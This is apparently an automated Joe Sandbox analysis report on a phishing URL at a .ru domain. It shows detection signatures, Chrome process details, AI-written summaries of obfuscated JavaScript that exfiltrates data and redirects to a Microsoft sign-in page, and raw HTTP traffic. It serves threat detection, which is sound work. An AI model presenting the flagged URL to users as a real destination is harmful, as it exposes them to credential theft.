Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://cesinc365.xemitronax.ru/9FAvn/

Overview

General Information

Sample URL:http://cesinc365.xemitronax.ru/9FAvn/
Analysis ID:1587009
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2304,i,16959890076027813342,710148455855415502,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cesinc365.xemitronax.ru/9FAvn/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://cesinc365.xemitronax.ru/9FAvn/Avira URL Cloud: detection malicious, Label: phishing
Source: https://cesinc365.xemitronax.ru/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cesinc365.xemitronax.ru/9FAvn/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cesinc365.xemitronax.ru/9FAvn/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes obfuscated code and a debugger trap, which are common techniques used in malicious scripts. Overall, this script demonstrates a clear intent to interfere with the user's normal browsing experience and potentially compromise their security, making it a high-risk threat.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cesinc365.xemitronax.ru/9FAvn/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. Overall, the script demonstrates highly suspicious and potentially malicious behavior.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 1a03fb5f-760e-43d0-b559-c881b8e10d5fc2b26769-672b-4039-84ac-f405513d5877
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://cesinc365.xemitronax.ru/9FAvn/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720503531459396.MWEwM2ZiNWYtNzYwZS00M2QwLWI1NTktYzg4MWI4ZTEwZDVmYzJiMjY3NjktNjcyYi00MDM5LTg0YWMtZjQwNTUxM2Q1ODc3&ui_locales=en-US&mkt=en-US&client-request-id=e5d1d38c-f5a9-4e16-baf0-571716780c29&state=smvEroIhxhJZuKHMS0irUFUjVSKE_2RAh1UVyz1MOIMslNOK5B_XcmTAiLd2btOw-TOLMYnIJdLuX9dZ3FUmsXLoEYlqBx3njIWP7CjherfkD-V7XeWMgh4S1K48NDaW4b_9QBGFHyjq64-NewXEgj4ftiJK2Y3pcw3fM2l7v8clMdp94RfrlNIpScQa2uiXHK2Frl8J2aEHUN7KTWqSZf8247LVdRY6v7EwF4BcHOuevSVhpZhoznGC6D6qt0LkTDGuWJOlsbxfFLyuLbqtZw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /9FAvn/ HTTP/1.1Host: cesinc365.xemitronax.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
